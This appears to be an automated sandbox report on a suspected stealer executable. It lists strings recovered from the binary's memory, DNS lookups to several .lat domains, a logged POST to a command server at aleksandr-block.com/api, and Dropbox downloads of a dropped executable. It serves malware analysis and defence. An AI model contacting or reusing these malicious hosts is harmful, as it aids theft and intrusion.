              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: oContent-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=207508de5b63d2f8b6c628c5; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35141Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveTue, 14 Jan 2025 07:55:30 GMTDateProxy-Connect equals www.youtube.com (Youtube)
              Source: yTRd6nkLWV.exeString found in binary or memory: ttp://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchf equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: shoefeatthe.lat
              Source: global trafficDNS traffic detected: DNS query: bloodyswif.lat
              Source: global trafficDNS traffic detected: DNS query: washyceehsu.lat
              Source: global trafficDNS traffic detected: DNS query: leggelatez.lat
              Source: global trafficDNS traffic detected: DNS query: miniatureyu.lat
              Source: global trafficDNS traffic detected: DNS query: kickykiduz.lat
              Source: global trafficDNS traffic detected: DNS query: savorraiykj.lat
              Source: global trafficDNS traffic detected: DNS query: finickypwk.lat
              Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
              Source: global trafficDNS traffic detected: DNS query: aleksandr-block.com
              Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
              Source: global trafficDNS traffic detected: DNS query: ucc3847efbfdc5176cc975eba0f9.dl.dropboxusercontent.com
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: aleksandr-block.com
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
              Source: yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: yTRd6nkLWV.exeString found in binary or memory: http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w
              Source: yTRd6nkLWV.exeString found in binary or memory: http://cevcsca2021.ocsp-certum.com07
              Source: yTRd6nkLWV.exeString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
              Source: yTRd6nkLWV.exeString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
              Source: yTRd6nkLWV.exeString found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
              Source: yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: yTRd6nkLWV.exeString found in binary or memory: http://repository.certum.pl/cevcsca2021.cer0
              Source: yTRd6nkLWV.exeString found in binary or memory: http://repository.certum.pl/ctnca.cer09
              Source: yTRd6nkLWV.exeString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
              Source: yTRd6nkLWV.exeString found in binary or memory: http://repository.certum.pl/ctsca2021.cer0A
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
              Source: yTRd6nkLWV.exeString found in binary or memory: http://store.steampowered.com/subscriber_
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
              Source: yTRd6nkLWV.exeString found in binary or memory: http://subca.ocsp-certum.com01
              Source: yTRd6nkLWV.exeString found in binary or memory: http://subca.ocsp-certum.com02
              Source: yTRd6nkLWV.exeString found in binary or memory: http://subca.ocsp-certum.com05
              Source: Amcache.hve.1.drString found in binary or memory: http://upx.sf.net
              Source: yTRd6nkLWV.exeString found in binary or memory: http://www.certum.pl/CPS0
              Source: yTRd6nkLWV.exeString found in binary or memory: http://www.innosetup.com/
              Source: yTRd6nkLWV.exeString found in binary or memory: http://www.remobjects.com/ps
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
              Source: yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.sprig.com/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/client
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.0000000000713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1539997229.00000000006BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/(w
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/2
              Source: yTRd6nkLWV.exe, 00000001.00000003.1499124135.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1501934748.00000000006E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/44
              Source: yTRd6nkLWV.exe, 00000001.00000003.1539997229.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599483403.00000000006BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/A4
              Source: yTRd6nkLWV.exe, 00000001.00000003.1486470955.00000000006FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/Q
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000690000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1557953970.000000000339E000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1539498159.000000000339B000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1514906942.000000000339E000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1557953970.000000000339C000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1513735860.000000000339F000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1472950893.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1486737049.00000000033A3000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1499794717.0000000003397000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1539997229.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1486212475.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1528875799.000000000339A000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1539498159.000000000339E000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.0000000000693000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/api
              Source: yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/apiA
              Source: yTRd6nkLWV.exe, 00000001.00000003.1528875799.000000000339A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/apiaK
              Source: yTRd6nkLWV.exe, 00000001.00000003.1513735860.000000000339C000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1514906942.000000000339C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/apili
              Source: yTRd6nkLWV.exe, 00000001.00000003.1557953970.000000000339E000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1539498159.000000000339E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/apizK
              Source: yTRd6nkLWV.exe, 00000001.00000003.1514906942.000000000339E000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1513735860.000000000339F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/ob
              Source: yTRd6nkLWV.exe, 00000001.00000003.1472950893.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1486212475.00000000033A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/pJ
              Source: yTRd6nkLWV.exe, 00000001.00000003.1514906942.000000000339E000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1513735860.000000000339F000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1472950893.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599483403.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1486212475.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/pi
              Source: yTRd6nkLWV.exe, 00000001.00000003.1473028075.0000000000724000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1513898229.0000000000727000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1540482872.000000000069F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com:443/api
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.login.yahoo.com/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellofax.com/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellosign.com/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1599818334.0000000000710000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599889207.0000000000724000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.0000000000725000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.000000000070F000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp, 0A8O8L4RV6JWV8ND8.exe.1.drString found in binary or memory: https://assets.dropbox.com/www/en-us/illustrations/spot/target-miss.svg
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.0000000000675000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
              Source: yTRd6nkLWV.exe, 00000001.00000003.1502839435.000000000339A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
              Source: yTRd6nkLWV.exe, 00000001.00000003.1502839435.000000000339A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canny.io/sdk.js
              Source: yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcom
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1599818334.0000000000710000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599889207.0000000000724000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.0000000000725000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.000000000070F000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp, 0A8O8L4RV6JWV8ND8.exe.1.drString found in binary or memory: https://cfl.dropboxstatic.com/static/images/favicon.ico
              Source: yTRd6nkLWV.exe, 00000001.00000002.1599818334.0000000000710000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599889207.0000000000724000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.0000000000725000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.000000000070F000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp, 0A8O8L4RV6JWV8ND8.exe.1.drString found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/error.css
              Source: yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1598280172.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.f
              Source: yTRd6nkLWV.exe, 00000001.00000003.1558338882.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1528399384.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1473028075.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1598280172.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.stea
              Source: yTRd6nkLWV.exeString found in binary or memory: https://community.fastly.steam
              Source: yTRd6nkLWV.exeString found in binary or memory: https://community.fastly.steamstatic.c
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=SCXpgixTDzt4&a
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
              Source: yTRd6nkLWV.exeString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/j
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=BFN_
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
